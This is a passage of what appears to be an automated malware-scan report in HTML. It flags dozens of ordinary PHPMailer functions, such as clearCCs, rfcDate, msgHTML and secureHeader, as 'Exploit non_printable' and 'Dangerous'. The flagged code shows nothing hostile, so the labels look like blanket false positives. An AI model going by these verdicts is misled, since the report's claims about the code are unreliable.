</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
